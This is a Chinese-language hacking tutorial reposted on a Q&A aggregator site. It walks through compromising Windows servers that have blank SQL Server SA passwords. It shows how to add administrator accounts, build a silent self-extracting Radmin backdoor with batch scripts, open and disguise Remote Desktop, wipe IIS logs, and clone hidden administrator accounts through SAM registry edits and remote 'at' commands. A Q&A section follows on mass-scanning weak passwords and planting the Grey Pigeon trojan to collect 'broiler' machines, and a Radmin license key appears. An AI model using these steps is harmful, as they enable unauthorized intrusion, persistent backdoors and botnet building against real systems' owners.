入侵软件

入侵软件,第1张

SA空口令入侵到3389终结完整编(转)

SA空口令入侵到3389终结完整编

作者:fibwet 来源:原创 更新时间:2006-5-2 浏览次数:40

工具:WINNTAutoAttack自动攻击器(扫漏洞)

SQLTOOLS(SA空口令连接器)

RAMDIN影子3.0中文版(远程控制程序)

RADMIN注册码:

08US9A95I+lKa9nbOLXqv0V8xqdDvKGcNcTpN2wV11iSqOCVuA6A5KKZRHc5GVMIybWomK6rNwoj8mYy8LXRFi23

SC.exe port.bat query.exe quser.exe(隐藏3389服务及不让管理发现自己程序)

CleanIISLog.exe(小榕的擦PP程序)

3389.exe(开3389端口服务的)

psu.exe(使用被禁止的Guest帐户要用到的)

mstsc.exe(远程桌面连接程序)

下载(点右键用下载工具下)

一.扫到SA弱口令..(自动攻击器)

二.用SQLTOOLS连上去建一个用户

net start telnet 开telnet服务

net user mint mint /add 添加用户mint密码为mint

net localgroup administrators mint /add 将帐号mint升级为管理员

三.上传后门程序RAD.EXE(RADMIN服务端自解压程序)

制作RAD.EXE过程:

1、到Radmin安装目录下找到AdmDll.dll、 raddrv.dll和r_sever.exe(从新

2、在本地设置服务端(一定要生成)

设置密码-->>设置连接端口(默认4489)-->>生成

3、导出注册表HKEY_LOCAL_MACHINE\SYSTEM\Radmin的键值为1.reg

4、编写一个批处理,并命名为u.bat

--------------------------------------------

@echo off

net stop r_server

--------------------------------------------

5、写第二个批处理,r.bat,内容为

--------------------------------------------

@echo off

@Explorer.exe /uninstall /silence

@Explorer.exe /install /silence

@regedit /s 1.reg

@echo off

@Explorer.exe /uninstall /silence

@Explorer.exe /install /silence

@regedit /s 1.reg

@net start r_server

@del rad.exe

@del 1.reg

@del r.bat

@del u.bat

--------------------------------------------

6、将AdmDLL.dll raddrv.dll Explorer.exe(r_sever.exe改名) u.bat r.bat压缩成Rad.RAR压缩包

7、将Rad.rar制作成自解压文件.

选择Default.sfx的自释放模块-->>高级自释放选项

-->>常规

释放路径:%systemroot%\system32

安装程序:释放后运行:r.bat 释放前运行u.bat

-->>摸式

缄默模式:全部隐藏 覆盖方式:覆盖所有文件

-->>确定-->>确定

生成完成

四.用RADMIN客服端连接....

上传文件到c:\WINNT(XP是windows):

port.bat(如果是在XP下..这个要把里面的WINNT改为Windows)

query.exe quser.exe

SC.exe

CleanIISLog.exe.exe

3389.exe

psu.exe

最好再上传一个反d后门

RADMIN进入TELNET

运行 c:\winnt\3389.exe

重启肉鸡

五.重启后用远程桌面远程器连上去

这里就有时会出现个问题..

使用3389登陆。发现登陆用户已满。不用怕。我们把他踢出去。

telnet对方ip。发现需要NTLM 身份验证。

我们在自己的电脑里建立一个帐号mint密码为mint身份为管理员。

找到c:\winnt\system32\cmd.exe 建立一个快捷方式到桌面。

修改cmd的快捷方式属性为允许其他身份登陆。

然后运行桌面上的cmd.exe的快捷方式。输入帐号mint密码mint

telnet对方ip.直接可以登陆对方电脑了。

使用命令

c:\query user (查看对方目前终端登陆状况。)

运行命令

c:\logoff 1(踢出去一个管理者)

再用c:\query user检查一便~~(这就是为什么不马上用1.bat了)

六.连上后..在cmd下运行

c:\winnt\log . 自己的IP .(擦PP)

c:\winnet\1.bat (删除覆盖查看当前在线用户文件)

作者: 125.90.34.* 2006-7-14 23:30 回复此发言

--------------------------------------------------------------------------------

2 SA空口令入侵到3389终结完整编

七.打SA空口令补丁

程序-->>Microsoft SQL Server-->>查询分析器(有放大镜的)

-->>Windowst身位验证登陆

复制一下代码:SELMIS

--------------------------------------------

if exists (select * from

dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and

OBJECTPROPERTY(id, N'IsExtendedProc') = 1)

exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'

GO

--------------------------------------------

按F5(运行)

关了退出SQL Server再用SQL Server身位验证进一次.退出(这是为了不留下记录)

八.改3389端口和服务名称

修改服务器端的端口设置 ,注册表有2个地方需要修改。

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]

PortNumber值,默认是3389,选择10进制 修改成所希望的端口,比如1314

第二个地方:

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]

PortNumber值,默认是3389,选择10进制 修改成所希望的端口,比如1314

要重启系统才能用新端口连.(不急..改了他的服务名再重启系统吧)

导出3389服务的

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]

的键值为mm.reg文件.

编辑mm.reg文件.替换TermService为Alerter(错误警告服务..别的服务也行)

再把第十行的"Description"="(这里是服务说明..改为你所换的服务说明..这里改为通知所选用户和计算机有关系统管理级警报。)"

第十一行的"DisplayName"="(这里是服务名称..改为你所换的服务名称..这里改为Alerter)

保存..再导入注册表(这里要先运行Services.msc(可在CMD下打这命令)服务管理器..把Alerter的服务先停止)

再在CMD下

CD c:\winnt\system32

copy termsrv.exe service.exe(这里是复制termsrv.exe为Alerter服务文件名差不多的文件)

CD C:\winnt

sc \\127.0.0.1 config Alerter binpath= c:\winnt\system32\service.exe(这里是从新定向Alerter服务文件.服务名一定要区分大小写A要大写)

九.注消后(注消比直接关要好些)..用Radmin重启肉鸡..

十.使用被禁用的帐户[Guest]登陆.删除自己开始建的帐号

1.使用psu.exe展开注册表到

HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users

用法:[psu -p regedit -i pid]

Pid 的值为在任务栏空白处点右键-->>任务管理器--->>进程中的winlogon.exe后面的数值就是PID数值

如:psu –p regedit –i 157

将Guest克成管理员权限

克成管理员权限的方法:

找到HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\Administrator的类型值.

在HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\下找到这个类型值在复制数值名为F的数值数剧覆盖相应的Guest的类型值(找的方法一样)

导出Guest的配置(也就是导出HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Guest和他相应的类型值的数据) 然后删除Guest的配置

2.查看计算机管理中帐户列表 刷新这时候会出现错误[找不到帐户](跳过这步也行)

3.将Guest的配置(二个REG文件导进注册表)

4.修改Guest帐户密码,命令行下禁用Guest帐户[一定是命令行下]

net user Guest **** [修改密码]

net user Guest /active:yes

net user Guest /active:no[命令行下禁用Guest]

5.实验被禁止的帐户Guest是否可用.

6.用Guest登陆后删除自己建的帐号

net user mint /del

整个过程结束

最后最好把RADMIN的服务也改了..多留个后门多条路..呵呵

整个过程全部结束..这机子就真正变成你的肉鸡了...

文章里面的内容都是以下动画的内容(通过我自己的理解写的..也许存在许多错误..希望对和偶一样的菜鸟有帮助)

作者: 125.90.34.* 2006-7-14 23:30 回复此发言

--------------------------------------------------------------------------------

3 SA空口令入侵到3389终结完整编

笑语☆嫣然的《终结3389》

mervin制作 <《终结3389》补充版>

孤狼望月 <使用被禁用的帐户[Guest]登陆>

(他还有个(隐藏帐号后门教程)也差不多)

碎片 <Radmin服务端最新配置方法>

最后送一个找固定IP肉鸡的方法:

菜菜鸟教程之-如何提高扫描到肉鸡的机会 BY:网络凡人

先找个有不正常端口的代理,代理我一般到网迷之家(www.52cyq.com)拿的。就这个好了

218.58.88.15:45576 [山东省 青岛市](我的是教育网,扫描不到国外的机的,所以用国内的IP来

做试范),我把它扩充了整一个网段。由218.58.88.1-218.58.88.255你可以扩充成218.58.80.1-

218.58.90.255 .端口为了减少动画的大小,就扫描3389好了,。IP扩充多少就要看你

的网快还是慢。快的就扩充多点,慢的只扫描一个c段IP好了。看到没有,[218.58.88.8]:

发现 NT-Server弱口令: Administrator/[空口令]就是这么简单就可以扫描到肉鸡的,记得,

我这里出不了国外,才扫描国内的机。你们扫描国外的机,不要扫描国内的机啊~

如果发生了什么事,公安会找你的哦。好了。扫描就说到这了。

、假设我们是以超级用户administrator登录到开有终端服务的肉鸡上的,首先在命令行下或帐户管理器中建立一个帐户:hacker$,这里我在命令行下建立这个帐户

net user hacker$ 1234 /add

2、在开始/运行中输入:regedt32.exe并回车来运行regedt32.exe。

3、点“权限”以后会d出窗口

点添加将我登录时的帐户添加到安全栏内,这里我是以administrator的身份登录的,所以我就将administrator加入,并设置权限为“完全控制"。这里需要说明一下:最好是添加你登录的帐户或帐户所在的组,切莫修改原有的帐户或组,否则将会带来一系列不必要的问题。等隐藏超级用户建好以,再来这里将你添加的帐户删除即可。

4、再点“开始”→“运行”并输入"regedit.exe" 回车,启动注册表编辑器regedit.exe。

打开键:HKEY_LOCAL_MAICHINE\SAM\SAM\Domains\account\user\names\hacker$"

5、将项hacker$、00000409、000001F4导出为hacker.reg、409.reg、1f4.reg,用记事本分别打这几个导出的文件进行编辑,将超级用户对应的项000001F4下的键"F"的值复制,并覆盖hacker$对应的项00000409下的键"F"的值,然后再将00000409.reg与hacker.reg合并。

6、在命令行下执行net user hacker$ /del将用户hacker$删除:net user hacker$ /del

7、在regedit.exe的窗口内按F5刷新,然后打文件-导入注册表文件将修改好的hacker.reg导入注册表即可

8、到此,隐藏的超级用户hacker$已经建好了,然后关闭regedit.exe。在regedt32.exe窗口内把HKEY_LOCAL_MACHINE\SAM\SAM键权限改回原来的样子(只要删除添加的帐户administrator即可)。

9、注意:隐藏的超级用户建好后,在帐户管理器看不到hacker$这个用户,在命令行用“net user”命令也看不到,但是超级用户建立以后,就不能再改密码了,如果用net user命令来改hacker$的密码的话,那么在帐户管理器中将又会看这个隐藏的超级用户了,而且不能删除。

如何在命令行下远程建立隐藏的超级用户

在这里将用at的命令,因为用at产生的计划任务是以系统身份运行的,所以也用不到psu.exe程序。为了能够使用at命令,肉鸡必须开有schedule的服务,如果没有开启,可用流光里带的工具netsvc.exe或sc.exe来远程启动,当然其方法也可以,只要能启动schedule服务就行。

对于命令行方式,你可以采用各种连接方式,如用SQLexec连接MSSQL的1433端口,也可以用telnet服务,只要以你能得到一个cmdshell,并且有运行at命令的权限就可以。

1、首先找到一台肉鸡,至于如何来找那不是我这里所说的话题。这里先假设找到一台超级用户为administrator,密码为12345678的肉鸡,现在我们开始在命令行下远程为它建立隐藏的超级用户。(例子中的主机是我的局域网内的一台主机,我将它的ip地址改为13.50.97.238,,请勿在互联网上对号入座,以免骚扰正常的ip地址。)

作者: 125.90.34.* 2006-7-14 23:30 回复此发言

--------------------------------------------------------------------------------

4 SA空口令入侵到3389终结完整编

2、先与肉鸡建立连接,命令为: net use \\13.50.97.238\ipc$ "12345678" /user:"administrator

3、用at命令在肉鸡上建立一个用户(如果at服务没有启动,可用小榕的netsvc.exe或sc.exe来远程启动):at \\13.50.97.238 12:51

c:\winnt\system32\net.exe user hacker$ 1234 /add

建立这个加有$符的用户名,是因为加有$符后,命令行下用net user将不显示这个用户,但在帐户管理器却能看到这个用户。

4、同样用at命令导出HKEY_LOCAL_MACHINE\sam\sam\Domains\account\users下键值:at \\13.50.97.238 12:55

c:\winnt\regedit.exe /e hacker.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\account\users\

/e 是regedit.exe的参数,在_LOCAL_MACHINE\SAM\SAM\Domains\account\users\这个键的一定要以\结尾。必要的情况下可以用引号将"c:\winnt\regedit.exe /e hacker.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\account\users\"引起来。

5、将肉鸡上的hacker.reg下载到本机上用记事本打开进行编辑命令为:copy \\13.50.97.238\admin$\system32\hacker.reg

c:\hacker.reg

修改的方法图形界中已经介绍过了,这里就不作介绍了。

6、再将编辑好的hacker.reg拷回肉鸡上 copy c:\hacker.reg \\13.50.97.238\admin$\system32\hacker1.reg

7、查看肉鸡时间:net time \\13.50.97.238 然后用at命令将用户hacker$删除:

at \\13.50.97.238 13:40 net user hacker$ /del

8、验证hacker$是否删除:用

net use \\13.50.97.238 /del 断开与肉鸡的连接。

net use \\13.50.97.238\ipc$ "1234" /user:"hacker$" 用帐户hacker$与肉鸡连接,不能连接说明已删除。

9、再与肉鸡建立连接:net use \\13.50.97.238\ipc$ "12345678" /user:"administrator"

再取得肉鸡时间,用at命令将拷回肉鸡的hacker1.reg导入肉鸡注册表:

at \\13.50.97.238 13:41 c:\winnt\regedit.exe /s hacker1.reg

regedit.exe的参数/s是指安静模式。

10、再验证hacker$是否已建立,方法同上面验证hacker$是否被删除一样。

11、再验证用户hacker$是否有读、写、删的权限,如果不放心,你还可验证是否能建立其它帐户。

12、通过11可以断定用户hacker$具有超级用户权限,因为最初我用at命令建立它的时候是一个普通用户,而现在却具有远程读、写、删的权限。

三、如果肉鸡没有开3389终端服务,而我又不想用命令行,怎么办?

这种情况下,你也可以用界面方式来远程为肉鸡建立隐藏的超级用户。因为regedit.exe、regedt32.exe都有连接网络注册表的功能,你可以用regedt32.exe来为远程主机的注册表项设置权限,用regedit.exe来编辑远程注册表。帐户管理器也有一项连另一台计算机的功能,你可以用帐户管理器为远程主机建立和删除帐户。具体步聚与上面介绍的相似,我就不多说了,只它的速度实在是令人难以忍受。

但是这里有两个前提:1、先用net use \\肉鸡ip\ipc$ "密码" /user:"超级用户名"来与远程主机建立连接以后,才能用regedit.exe regedt32.exe及帐户管理器与远程主机连接。

2、远程主机必须开启远程注册表服务(没有开启的话,你也可以远程开启,因为你有超级用户的密码了)。

四、利用被禁用的帐户建立隐藏的超级用户:

我们可以用肉鸡上被禁止的用户来建立隐藏的超组用户.方法如下:

1.想办法查看有哪些用户被细心的管理员禁止,一般情况下,有些管理员出于安全考虑,通常会将guest禁用,当然了会禁用其它用户。在图形界面下,非常容易,只要在帐户管理器中就可以看到被禁用的帐户上有一个红叉;而在命令行下,我还没有想到好的办法,只能在命令行下用命令:"net user 用户名"一个一个来查看用户是否被禁用。

2.在这里,我们假设用户hacker被管理员禁用。首先,我先用小榕的超组用户克隆程序CA.exe,将被禁用的用户hacker 克隆成超级用户(克隆之后,被禁用的用户hacker就会自动被激活了): CA.EXE \\肉鸡ip Administrator 超级用户密码 hacher hacher密码。

作者: 125.90.34.* 2006-7-14 23:30 回复此发言

--------------------------------------------------------------------------------

5 SA空口令入侵到3389终结完整编

3.如果你现在一个cmdshell,如利用telnet服务或SQLEXEC连接肉鸡的msSQL的默认端口1433得到的shell都可以,这时你只要输入命令:

net user hacker /active:no 这样用户hacker就被禁用了(至少表面上是这样的),当然你也可以将用户hacher换成其它的被禁用的用户。

4.这时如果你在图形界面下看帐户管理器中的用户时,会发现用户hacker被禁用了,但事实上是这样的吗?你用这个被禁用的用户连接一下肉鸡看看是否能连上?用命令:net user \\肉鸡ip\ipc$ "hacker密码" /user:"hacker" 连一连看看。我可以告诉大家,经过我多次试验,次次都能成功,而且还是超级用户权限。

5.如果没有cmdshell怎么办?你可以我上面介绍的at命令来禁用用户hacker命令格式:at \\肉鸡ip 时间 net user hacker /active:no

6.原理:具体的高深的原理我也说不上来,我只能从最简单的说。你先在图形界面下在帐户管理器中禁用一下超级用户administrator看看,肯定会d出一对话框,并禁止你继续禁用超级用户administrator,同样,因为在克隆时,hacker在注册表的"F"键被超级用户administrator在注册表的"F"键所替代,因而hacker就具有了超级用户的权限了,但是由于hacker在注册表内"C"健还是原来的"C"键,所以hacker还是会被禁用,但是它的超级用户权限却不会被禁用,因此被禁用的用户hacker还是可以连接肉鸡,而且还具有超级用户的权限。具体我也说不明白,大家权且这么理解吧。

五、注意的几点事项:

1、隐藏的超级用户建立以后,在帐户管理器中和命令行下均看不到这个用户,但这个用户却存在。

2、隐藏的超级用户建立以后,就不能再修改密码了,因为一旦修改密码,这个隐藏的超级用户就会暴露在帐户管理器中,而且不能删除。

3、如在本机上试验时,最好用系统自带的备份工具先备份好本机的“系统状态”主要是注册表的备份,因为本人做试验时,曾出现过帐户管理器中看不到任何用户,组中也看不到任何组的现象,但它们却存在。幸好我有备份,呵呵。SAM键是毕竟系统最敏感的部位。

4、本方法在2000/XP上测试通过,未在NT上测试。本方法仅供研究,请勿将本方法用于破坏上,利用本方法造成严重后果者,由使用者负责,本人概不负责

问题一:灰鸽子怎么抓肉鸡 本人第一次用这个 求详细的 100分 灰鸽子正确的配置需要了解你的网络环境,内网和外网配置方式不同。内网映射,外网ftp、dns都可以实现自动上线。

灰鸽子抓鸡就是把你的服务端传播出去,使人运行的过程

我的百度账号就是我的qq

问题二:灰鸽子远程以后如何抓鸡 运行X-way.exe打开主界面,左边工具栏选主机搜索,中间d出窗填要扫描的起始IP地址,如自己的上网IP地址为58.54.144.20,可填起始地址为58.54.0.20,结束地址为58.54.255.20。(注意结束地址比起始地址大)。自己的上网IP可在hao123主页下部实用查询里的IP地址页看到。注意机器重启后上网IP会发生改变。搜索方式选端口方式(默认),线程设置里线程数可改为50-1000任选(根据机器性能)。这里说明一下,WIN XP 默认连接数为10,需先进行线程破解,网上工具很多,实在不行下载迅雷,迅雷软件界面顶端工具栏展开后选系统优化工具,修改连接数最大支持1024,重启后生效。X-way主机搜索界面,线程设置下面点击高级设置,d出主机搜索各参数设置窗口,端口设置里勾选other,端口139(默认)改为135,连接延时改为2秒,其他不变,关闭回到主机搜索界面。点击开始,扫描完毕后(也可中途停止),在下面主机列表框内右键点击,保存为 135.txt。建议保存到桌面,文件135.txt打开后样式如下: 58.54.1.65 端口:135开放

58.54.1.78 端口:135开放

58.54.1.85 端口:135开放

58.54.1.34 端口:135开放

58.54.1.109 端口:135开放

58.54.1.116 端口:135开放

58.54.1.135 端口:135开放

58.54.1.25 端口:135开放

58.54.1.146 端口:135开放

58.54.1.95 端口:135开放

58.54.1.123 端口:135开放

58.54.1.154 端口:135开放

运行黑色旋风IP程序进行IP整理(手动整理也可),将d出RaScal记事本,清空记事本内全部内容,再将135.txt内的全部内容复制到RaScal记事本,关闭RaScal记事本,将询问是否保存,点击“是”。回到黑色旋风IP整理工具,在窗口内点击一下(激活窗口),然后回车进行IP整理。稍等,整理完必的纯净IP文件,默认保存在黑色旋风IP安装目录下的RaScal文件里,打开后样式如下:(注意不要有其他内容或空格,绝对纯净) 58.50.1.101

58.50.2.238

58.50.5.3

58.50.7.112

58.50.13.87

58.50.15.233

58.50.20.22

58.50.20.28

58.50.20.66

58.50.20.69

58.50.20.107

打开ntscan10汉化版,可先用汉化补丁进行汉化处理(注意补丁安装路径应选择ntscan10安装目录),完毕后运行NTscan程序打开主界面,清空开始和结束IP,勾选主机文件,后面打开找到存放纯净IP的文件RaScal,线程数50-500任选(默认50),连接共享选admin$(默认),扫描选项勾选WMI扫描,扫描主机打开的端口改为135,其他不变。点击开始,NTscan程序将进行弱口令筛选。顺便提一下,NTscan10程序的弱口令文件在其安装目录下的NT_pass文件和NT_user文件里,NT_pass里是弱口令密码,NT_user里是常用弱口令用户,可用写字板打开编辑,进行弱口令增减,如可增加弱口令密码112233,666666,14......>>

问题三:如何用灰鸽子抓肉鸡 图文详细版 70分 现在这款的功能都有限了,还有更好的+

问题四:如何利用灰鸽子或其他工具抓肉鸡~扫描端口? 你们好狠啊

竟敢公开玩黑客。

牛逼啊

问题五:我也是个黑客,用灰鸽子抓了多少肉鸡 请允许我呵呵一下,还灰鸽子你是火星来的吧?这年代谁还用灰鸽子

问题六:我可能被别人用灰鸽子当肉鸡抓了怎么办啊 你宽带 拿去刷钻 刷QB啦, 解决方法简单, 你一开机, 打开任务管理器, 有个IEXPLORE.EXE 这是灰鸽子伪装的进程 其实是 灰鸽子. 灰鸽子首先丹感染IE 你只需要 管理此 进程就够了, 但是麻烦点,每次开机 都关闭,别人就无法控制啦.第二个方法, C盘还原.第三个方法.到杀毒软件 免费体验20多款杀软 查杀,灰鸽子做免杀不可能 针对 每一款做免杀,.第四个方法, C盘WIOWS文件夹进入 有个 一个安装文件的 图标, 那个就是 灰鸽子启动的木马,. 删除, 删除之前 必须 切断 IEXPLORE.EXE 这个进程 就能删除,

问题七:灰鸽子怎么对肉鸡进行远程桌面控制啊? 客户端要在肉鸡上运行才行,有一个t开头的链接,连接上ok

问题八:抓肉鸡需要什么工具? 领域中国抓肉鸡工具1008更新本软件修改了,中英文服务器使用时的,语言编码错误。加强.完善了扫描。完成配置信息后请手动运行此文件.bat自动抓肉鸡!以免减...10个回复-发帖时间:2009年4月26日软件大小:0K软件语言:简体中文软件属性:热软件添加:华夏黑客联盟软件等级:更新时间:2007-7-32:15:30解压密码:...教程名称:抓国外肉鸡详细版+工具动画大小:0K动画语言:12动画类型:1...4。现在开始用工具连它看出来了不知道是什么从来没看到过呵呵搞笑了换一抓肉鸡工具等会...9个回复-发帖时间:2009年1月6日9个回复-发帖时间:2007年3月12日中国知音445+139端口溢出批量抓肉鸡工具[第二版-皇冠体验版]免费版本.exeMD5:f07c440faed44e1316fed4519f6859f47,Trojan-Downloader.4293!IK,Win-Trojan/Xema.variant...8个回复-发帖时间:2009年5月1日20个回复-发帖时间:20071433抓肉鸡工具下载3月12日领域中国抓肉鸡工具2008更新软件修改了,中英文服务器使用时的,语言编码错误。加强.完善了扫描。,扫描工具,下载中心,戴威尔网络安全培训 文章来源: moker 原文链接: moker/wenwen/content/4135436193.shtml

问题九:挂马抓肉鸡,懂得+++ 抓鸡方法

135端口,先扫描135IP,然后整理!然后用NTscan,扫描弱口令,最后用Recton上传木马,自动运行的!因为这个漏洞很久,所以端口也很少的了!如果整理IP不好,就很难扫出弱口令。

1433端口,先扫描1433IP,然后整理!然后用X-Scan-v3.3,扫描模块只选择SQL-Server弱口令,然后扫出漏洞主机,再用SQLTools.exe连接,看看能不能执行DOS,如果不能就修复下,可以用“SQL查询分析器修正分离版”,修复命令我会打包的了!

3389端口,先扫描3389IP,然后用远程桌面连接,一个一个IP添加进入,见到XP,用户new密码为空进入,然后下载木马!见到2000,用户administrator密码为空进入然后下载木马!

4899端口,先扫描4899IP,然后整理!然后用4899探测器,A导入4899IP,然后开始搜索,B就是空口令的IP了,然后用Radmin,点连接到,把刚才扫到的空口令的IP添到IP地址那里,点确定,然后自己上传马,用DOS运行!

5900端口,用领域小组专版VNC扫描器,这个端口有些特别,不同其他的端口,所以扫IP工具也不同,扫到IP,看看有无V字开头,然后用VNCLink连接,自己然后下载马拉!

80端口,先扫描80IP,然后整理,再用Apache Tomcat导入IP,端口8080改为80,

问题十:灰鸽子能用来抓肉鸡么?怎么抓的? 灰鸽子让对方点击,是对方成为服务端 然后你作为客户端就可以连接上去了 灰鸽子最早只是款远控软件 然后功能太过强大就成木马了


欢迎分享,转载请注明来源:内存溢出

原文地址: https://outofmemory.cn/tougao/7866459.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2023-04-10
下一篇 2023-04-10

发表评论

登录后才能评论

评论列表(0条)

保存